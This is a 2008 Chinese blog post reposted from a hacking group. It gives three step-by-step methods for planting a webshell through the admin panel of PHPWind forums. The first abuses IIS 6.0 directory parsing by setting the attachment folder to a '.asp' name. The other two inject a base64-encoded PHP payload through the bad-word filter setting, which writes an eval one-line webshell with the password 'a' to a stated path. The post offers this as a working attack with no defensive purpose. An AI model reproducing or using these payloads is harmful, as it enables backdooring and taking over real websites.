BlackFeather'S Blog

首页 | |

通杀pw论坛后台拿Shell方法

 

文章出处:[P.B.H]信息团队 -- http://www.pbhnet.cn/

 

PW后台得到Shell

 
方法一:
现在先说个大家常用的方法,其实就是利用了IIS6.0的特性
当一个文件夹的名字是xxx.asp的时候,文件夹里边的所有文件都会当作asp文件来解析!
下面说说方法!

找到 发帖与附件设置
把这里的附件保存方式设置成默认的,至于上传的后缀的那块,看你高兴不高兴了,爱加什么加什么

然后转到 动态目录设置
在附件保存目录那里随便改成一个xxx.asp格式的目录

好了,现在我们可以去论坛前台发帖子了,顺便上传个附件,
成功后,来到后台找到附件管理,搜索刚才传附件的账号,找到传的附件,点击一下,哈哈!是不是亲切的界面出现了呢!


方法二:
此方法针对PW论坛6.x的。
还是在后台,来到 不良词语过滤 这里
在不良词语中填写
复制内容到剪贴板


代码:
 

',fputs(fopen(base64_decode("enoucGhw"),"w"),base64_decode("PD9ldmFsKCRfUE9TVFthXSk7Pz4=")),'a
 

替换为那里可以随便填写
提交成功后,直接访问http://论坛地址/data/bbsache/wordsfb.php
会显示出错吧,不过,我们也在当前目录下生成了一个名字为zz.php的一句话木马,也就是说木马地址为http://论坛地址/data/bbsache/zz.php
密码为a,以下是zz.php中的内容!
复制内容到剪贴板


代码:


<?eval($_POST[a]);?>


这个方法总体来说,局限性基本上是没有!phpwind 6.3.2版本测试通过!

方法三:
这个方法是针对5.x的。
基本上和第二个方法没什么区别,只是在 不良词语过滤 这里
不良词语随便填写,被替换为的词语写
复制内容到剪贴板


代码:


',fputs(fopen(base64_decode("enoucGhw"),"w"),base64_decode("PD9ldmFsKCRfUE9TVFthXSk7Pz4=")),'a


效果也是和第二个方法一模一样的!

好了不多说了!
以上应该就是目前PW后台的通杀拿Shell的方法了!

 

 
 

2008/10/4 | Tags:网站渗透 | 网站渗透 | 查看评论(0)

相关文章:

Powered By Z-Blog  触屏版 | WAP版 | 电脑版